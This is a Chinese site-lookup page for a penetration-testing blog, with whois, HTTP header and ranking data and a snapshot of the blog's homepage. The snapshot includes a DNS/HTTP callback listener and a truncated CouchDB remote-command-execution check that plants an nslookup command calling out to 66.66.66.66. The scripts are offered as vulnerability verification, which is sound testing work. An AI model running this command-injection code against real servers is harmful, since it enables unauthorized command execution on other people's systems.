www.xiyv.net PR:3 Alexa排名:2875485 Wolf博客 – 渗透、开发、数据库

网站综合查询

网站综合信息 www.xiyv.net

标题:
Wolf博客 – 渗透、开发、数据库

关键字:
西域西域网络西域安全渗透测试安全检测 MD5解密泄漏密码密码泄露泄漏密码查询 xss xss测试

描述:
西域

域名信息
域名年龄:11年1个月4天 注册日期:2013年08月17日 到期时间:2016年08月17日
注册商:GODADDY.COM, LLC

服务器空间
IP:36.51.255.161 同IP网站2个详情
地址:香港新浪公司香港和记环球电讯数据中心

备案信息
备案号:皖ICP备13015119号 审核时间:2014-03-13 详情
主办单位:应玲飞 性质:个人
网站名: 首页网址:

网站收录SEO数据

搜索引擎
收录量
反向链接
其他

百度
10
29
快照:无首页快照

Google
0
0
pr:3

雅虎
0

搜搜
0

搜狗
0
评级:1/10

360搜索
7

域名流量Alexa排名

一周平均
一个月平均
三个月平均

Alexa全球排名
-
-
2,875,485

平均日IP
-
-
-

日总PV
-
-
-

人均PV(PV/IP比例)
-
-
-

反向链接
0

dmoz目录收录
-

流量走势图

域名注册Whois信息

xiyv.net

域名年龄: 11年1个月4天
注册时间: 2013-08-17
到期时间: 2016-08-17
注册商: GODADDY.COM, LLC

获取时间: 2016年03月06日 10:55:35
Domain Name: XIYV.NET
Registrar: GODADDY.COM, LLC
Sponsoring Registrar IANA ID: 146
Whois Server: whois.godaddy.com
Referral URL: http://www.godaddy.com
Name Server: NS09.DOMAINCONTROL.COM
Name Server: NS10.DOMAINCONTROL.COM
Status: clientDeleteProhibited https://www.icann.org/epp#clientDeleteProhibited
Status: clientRenewProhibited https://www.icann.org/epp#clientRenewProhibited
Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Status: clientUpdateProhibited https://www.icann.org/epp#clientUpdateProhibited
Updated Date: 2016-01-10
Creation Date: 2013-08-17
Expiration Date: 2016-08-17

>>> Last update of whois database: Sun, 2016-Mar-06 02:59:39 GMT <<<

For more information on Whois status codes, please visit https://icann.org/epp

Domain Name: XIYV.NET
Registrar URL: http://www.godaddy.com
Registrant Name: xixiha xixiha
Registrant Organization: sdasd
Name Server: NS09.DOMAINCONTROL.COM
Name Server: NS10.DOMAINCONTROL.COM
DNSSEC: unsigned

For complete domain details go to:
http://who.godaddy.com/whoischeck.aspx?domain=XIYV.NET

网站头文件(HTTP Header)

HTTP/1.1 200 OK
服务器:nginx/1.4.4
访问时间:2016年09月28日 16:37:39
类型:text/html; charset=UTF-8
Transfer-Encoding: chunked
连接:keep-alive
Link: ; rel="https://api.w.org/"
动作:Accept-Encoding
Content-Encoding: gzip
代理服务器:10.67.15.28
网站编码:UTF-8

同IP网站(同服务器)

36.51.255.161 共2个网站 (香港新浪公司香港和记环球电讯数据中心)

秀蛋 - 不只是购物 www.showegg.com

Wolf博客 – 渗透、开发、数据库

其他后缀域名

顶级域名
相关信息

xiyv.com
已注册 2005年09月08日

xiyv.org
已注册 2014年06月11日

xiyv.cn
未注册 .cn

相关类似网站

查询与www.xiyv.net同域名/关键字的网站

bbs.xiyv.net

xiyv.net Wolf博客 – 渗透、开发、

网站首页快照(纯文字版)

抓取时间:2016年09月28日 16:34:28
网址:http://www.xiyv.net/
标题:Wolf博客 – 渗透、开发、数据库
关键字:西域,西域网络,西域安全,渗透测试,安全检测,MD5解密,泄漏密码,密码泄露,泄漏密码查询,xss,xss测试
描述:西域
主体:

跳至内容Wolf博客渗透、开发、数据库菜单和挂件QQ/Email:admin@xiyv.net搜索：近期文章漏洞辅助验证脚本(SSRF、RCE等)2016年5月25日网络资产信息扫描(F-NAScan)2016年5月25日中间件漏洞检测(MiddlewareScan)2016年5月25日文章归档2016年五月分类目录安全工具 (3)友情链接园长's blogshack2's blogMedici.Yan's blogk8's blogNuclear'Atkscanf's blogle4f's blogiswin's blogyaseng's blogyu1u's blogseay's blogTr3jer's blogsomd5-md5解密漏洞辅助验证脚本(SSRF、RCE等)用于检测无法直接回显或者特定情况下漏洞利用时需要用到的漏洞。例如这几天爆出的ImageMagick,FFMpeg漏洞，之前的反序列化漏洞等各种类型的代码执行、SSRF等等，具体可查看http://zone.wooyun.org/search/eye代码：import socket,thread,datetime,timequery_history = []url_history = []def web_server():web = socket.socket(socket.AF_INET,socket.SOCK_STREAM)web.bind(('0.0.0.0',80))web.listen(10)while True:try:conn,addr = web.accept()data = conn.recv(4096)req_line = data.split("\r\n")[0]path = req_line.split()[1]route_list = path.split('/')html = "NO"if len(route_list) == 3:if route_list[1] == 'add':url_history.append(route_list[2])elif route_list[1] == 'check':if route_list[2] in url_history:html = 'YES'else:query_str = route_list[1]for query_raw in query_history:if query_str in query_raw:html = "YES"print datetime.datetime.now().strftime('%m-%d %H:%M:%S') + " " + str(addr[0]) +' web query: ' + pathraw = "HTTP/1.0 200 OK\r\nContent-Type: application/json; charset=utf-8\r\nContent-Length: %d\r\nConnection: close\r\n\r\n%s" %(len(html),html)conn.send(raw)conn.close()except:passif __name__=="__main__":dns = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)dns.bind(('0.0.0.0',53))thread.start_new_thread(web_server,())while True:try:time.sleep(1)recv,addr = dns.recvfrom(1024)query_history.append(recv)print datetime.datetime.now().strftime('%m-%d %H:%M:%S') + " " +str(addr[0]) +' Dns Query: ' + recvexcept Exception,e:print equery_history = []continueVPS运行sudo python dns_log.py(监听80与53端口需root权限)无需安装任何外库，可直接运行，控制台即时输出请求内容供分析并提供web接口可用于脚本自动化验证触发：可指定dns服务器ip的dns请求(因dns的协议特性，验证的随机字符串不要包含.号)例 nslookup wolf 66.66.66.66各种方式的http请求均可例 curl http://66.66.66.66/add/wolf判断：dns: http://66.66.66.66/wolfhttp: http://66.66.66.66/check/wolf返回YES即此数据存在，也就是存在漏洞触发了验证请求操作。使用例子：CouchDB未授权访问导致系统命令执行漏洞检测脚本首先需要一台vps运行辅助检测的脚本。(需管理员权限运行)测试效果图代码：import urllib2import randomdef random_str(len):str1=""for i in range(len):str1+=(random.choice("ABCDEFGH1234567890"))return str(str1)def check(url):rand_str = random_str(8)cmd = random_str(4)req_list = [["/_config/query_servers/%s"%(cmd),'"nslookup %s 66.66.66.66>log"'%(rand_str)],["/vultest123",''],["/vultest123/test",'{"_id":"safetest"}']]for req_info in req_list:try:request = urllib2.Request(url+req_info[0],req_info[1])request.get_method = lambda: 'PUT'
urllib2.urlopen(request)
except:
pass
try:
req_exec = urllib2.Request(url + "/vultest123/_temp_view?limit=11",'{"language":"%s